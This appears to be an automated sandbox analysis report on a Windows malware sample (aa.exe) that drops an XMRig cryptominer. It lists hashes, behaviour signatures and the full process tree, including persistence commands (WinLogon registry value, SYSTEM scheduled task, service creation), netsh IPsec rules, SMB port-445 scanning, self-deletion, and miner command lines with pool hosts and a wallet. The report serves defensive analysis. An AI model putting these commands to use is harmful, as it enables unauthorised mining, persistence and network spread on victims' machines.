Analysis

Max time kernel: 151s
Max time network: 154s
Platform: windows7_x64
Resource: win7v20210410
Submitted: 07-05-2021 13:06

Behavioral task: behavioral1
  Sample: aa.exe
  Resource: win7v20210410

Behavioral task: behavioral2
  Sample: aa.exe
  Resource: win10v20210410

General

Target: aa.exe
Size: 28.1MB
MD5: 8d9d7f5babe3ee15f2e93a4321fa45cf
SHA1: 689d53ae66e75e0b5715c0d04a7cab20e5390790
SHA256: c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee
SHA512: 12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91
Malware Config

Signatures

Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  description      ioc                                                                                                                                      process
  Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "Explorer.exe C:\\Windows\\uuJCw\\TJZPFV.exe"  TJZPFV.exe

Detected Stratum cryptominer command
  Looks to be attempting to contact a Stratum mining pool.

XMRig Miner Payload (7 IoCs)
  resource                      yara_rule
  \Windows\uuJCw\TJZPFV.exe     xmrig
  \Windows\uuJCw\TJZPFV.exe     xmrig
  C:\Windows\uuJCw\TJZPFV.exe   xmrig
  C:\Windows\uuJCw\TJZPFV.exe   xmrig
  \Windows\uuJCw\Ys.exe         xmrig
  C:\Windows\uuJCw\Ys.exe       xmrig
  \Windows\uuJCw\Ys.exe         xmrig

Creates new service(s) (1 TTP)

Executes dropped EXE (4 IoCs)
  pid   process
  1772  TJZPFV.exe
  1620  Ys.exe
  2116  svchost.exe
  2192  svchost.exe

Deletes itself (1 IoC)
  pid   process
  1724  cmd.exe

Loads dropped DLL (8 IoCs)
  pid   process
  1996  aa.exe
  1996  aa.exe
  1772  TJZPFV.exe
  1600
  2084  cmd.exe
  2084  cmd.exe
  2156  cmd.exe
  2156  cmd.exe

Drops file in Windows directory (64 IoCs)
  description                   ioc                                        process
  File created                  C:\Windows\uuJCw\etchCore-0.x64.dll        TJZPFV.exe
  File created                  C:\Windows\uuJCw\exma-1.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\pcrecpp-0.dll             TJZPFV.exe
  File created                  C:\Windows\uuJCw\posh-0.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\trch-0.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\trch-1.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\xdvl-0.dll                TJZPFV.exe
  File opened for modification  C:\Windows\uuJCw\HOST                      TJZPFV.exe
  File created                  C:\Windows\boy.exe                         aa.exe
  File created                  C:\Windows\uuJCw\Cstr.fb                   TJZPFV.exe
  File created                  C:\Windows\uuJCw\Cstr.xml                  TJZPFV.exe
  File created                  C:\Windows\uuJCw\pcre-0.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\Ys.exe                    TJZPFV.exe
  File created                  C:\Windows\uuJCw\riar.dll                  TJZPFV.exe
  File created                  C:\Windows\uuJCw\trfo-2.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\ucl.dll                   TJZPFV.exe
  File created                  C:\Windows\uuJCw\TJZPFV.exe                aa.exe
  File created                  C:\Windows\uuJCw\eteb-2.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\libeay32.dll              TJZPFV.exe
  File created                  C:\Windows\uuJCw\tucl.dll                  TJZPFV.exe
  File opened for modification  C:\Windows\uuJCw\s.bat                     TJZPFV.exe
  File created                  C:\Windows\uuJCw\qdx.bat                   TJZPFV.exe
  File created                  C:\Windows\uuJCw\crli-0.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\esco-0.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\libxml2.dll               TJZPFV.exe
  File created                  C:\Windows\uuJCw\zlib1.dll                 TJZPFV.exe
  File opened for modification  C:\Windows\uuJCw\Result.txt                svchost.exe
  File created                  C:\Windows\uuJCw\Cstr.exe                  TJZPFV.exe
  File created                  C:\Windows\uuJCw\dmgd-1.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\pcla-0.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\trfo-0.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\svchost.exe               TJZPFV.exe
  File created                  C:\Windows\uuJCw\tibe.dll                  TJZPFV.exe
  File created                  C:\Windows\uuJCw\tibe-1.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\trfo.dll                  TJZPFV.exe
  File created                  C:\Windows\uuJCw\tucl-1.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\etchCore-0.x86.dll        TJZPFV.exe
  File opened for modification  C:\Windows\uuJCw\tscl.html                 TJZPFV.exe
  File created                  C:\Windows\uuJCw\chrome..xml               TJZPFV.exe
  File created                  C:\Windows\uuJCw\libcurl.dll               TJZPFV.exe
  File created                  C:\Windows\uuJCw\libiconv-2.dll            TJZPFV.exe
  File created                  C:\Windows\uuJCw\chrome..exe               TJZPFV.exe
  File created                  C:\Windows\uuJCw\cnli-0.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\coli-0.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\etebCore-2.x64.dll        TJZPFV.exe
  File created                  C:\Windows\uuJCw\tscl.html                 aa.exe
  File created                  C:\Windows\uuJCw\cnli-1.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\ssleay32.dll              TJZPFV.exe
  File created                  C:\Windows\uuJCw\TFf                       TJZPFV.exe
  File opened for modification  C:\Windows\uuJCw\svchost.exe               TJZPFV.exe
  File opened for modification  C:\Windows\end.bat                         TJZPFV.exe
  File created                  C:\Windows\uuJCw\etch-0.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\riar-2.dll                TJZPFV.exe
  File created                  C:\Windows\uuJCw\ip.dll                    TJZPFV.exe
  File created                  C:\Windows\uuJCw\etebCore-2.x86.dll        TJZPFV.exe
  File created                  C:\Windows\uuJCw\pcreposix-0.dll           TJZPFV.exe
  File created                  C:\Windows\uuJCw\posh.dll                  TJZPFV.exe
  File created                  C:\Windows\uuJCw\trch.dll                  TJZPFV.exe
  File created                  C:\Windows\uuJCw\iconv.dll                 TJZPFV.exe
  File created                  C:\Windows\uuJCw\zibe.dll                  TJZPFV.exe
  File created                  C:\Windows\end.bat                         TJZPFV.exe
  File created                  C:\Windows\uuJCw\chrome..fb                TJZPFV.exe
  File created                  C:\Windows\uuJCw\adfw.dll                  TJZPFV.exe
  File created                  C:\Windows\uuJCw\exma.dll                  TJZPFV.exe

Launches sc.exe
  sc.exe is a Windows utility to control services on the system.

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid   process
  1772  TJZPFV.exe  (the same event recorded 64 times)

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description                   pid   process
  Token: SeLockMemoryPrivilege  1620  Ys.exe
  Token: SeLockMemoryPrivilege  1620  Ys.exe

Suspicious use of SetWindowsHookEx (4 IoCs)
  pid   process
  1996  aa.exe
  1996  aa.exe
  1772  TJZPFV.exe
  1772  TJZPFV.exe

Suspicious use of WriteProcessMemory (64 IoCs)
  Each source/target pair below was recorded four times (16 distinct pairs, 64 events).
  source pid  source process  target pid  target process
  1996        aa.exe          1772        TJZPFV.exe
  1996        aa.exe          1724        cmd.exe
  1772        TJZPFV.exe      1104        cmd.exe
  1104        cmd.exe         272         netsh.exe
  1104        cmd.exe         1392        netsh.exe
  1104        cmd.exe         1588        netsh.exe
  1104        cmd.exe         1296        netsh.exe
  1104        cmd.exe         1624        netsh.exe
  1772        TJZPFV.exe      336         cmd.exe
  1772        TJZPFV.exe      328         cmd.exe
  328         cmd.exe         292         netsh.exe
  336         cmd.exe         1592        netsh.exe
  1104        cmd.exe         1608        netsh.exe
  336         cmd.exe         968         netsh.exe
  328         cmd.exe         1328        netsh.exe
  1104        cmd.exe         1632        netsh.exe
Processes

Child processes are indented beneath their parent; the cmdline entry under each image path is the command line it was started with.

C:\Users\Admin\AppData\Local\Temp\aa.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\aa.exe"
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

    C:\Windows\uuJCw\TJZPFV.exe
      cmdline: C:\Windows\uuJCw\TJZPFV.exe
      - Modifies WinLogon for persistence
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /c ""C:\Windows\end.bat" "
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add policy name=ipsec_ply

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filterlist name=deny_pt

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filterlist name=allow_pt

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filteraction name=deny action=block

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filteraction name=allow action=negotiate

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static set policy name=ipsec_ply assign=y

        C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /c ""C:\Windows\end.bat" "
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add policy name=ipsec_ply

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filterlist name=deny_pt

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filterlist name=allow_pt

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filteraction name=deny action=block

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filteraction name=allow action=negotiate

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static set policy name=ipsec_ply assign=y

        C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /c ""C:\Windows\end.bat" "
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add policy name=ipsec_ply

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filterlist name=deny_pt

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filterlist name=allow_pt

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filteraction name=deny action=block

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add filteraction name=allow action=negotiate

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"

            C:\Windows\SysWOW64\netsh.exe
              cmdline: netsh ipsec static set policy name=ipsec_ply assign=y

        C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /c ""C:\Windows\end.bat" "

        C:\Windows\SysWOW64\sc.exe
          cmdline: sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"

        C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /c ""C:\Windows\uuJCw\qdx.bat" "

            C:\Windows\SysWOW64\schtasks.exe
              cmdline: schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\uuJCw\TJZPFV.exe" /SC ONSTART
              - Creates scheduled task(s)

        C:\Windows\uuJCw\Ys.exe
          cmdline: "C:\Windows\uuJCw\Ys.exe" -o stratum+tcp://dns.monerogb.com:6502 -o stratum+tcp://note.monerogb.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken

        C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /c ""C:\Windows\uuJCw\s.bat" "
          - Loads dropped DLL

            C:\Windows\uuJCw\svchost.exe
              cmdline: svchost.exe syn 10.7.0.0 10.7.255.255 445 /save
              - Executes dropped EXE

        C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /c ""C:\Windows\uuJCw\s.bat" "
          - Loads dropped DLL

            C:\Windows\uuJCw\svchost.exe
              cmdline: svchost.exe tcp 10.7.0.0 10.7.255.255 445 450 /save
              - Executes dropped EXE
              - Drops file in Windows directory

    C:\Windows\SysWOW64\cmd.exe
      cmdline: cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"
      - Deletes itself

C:\Windows\system32\conhost.exe
  cmdline: \??\C:\Windows\system32\conhost.exe "-734435346-39989641855249382-1063396119-2998157751948519609179847362-1302738693"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads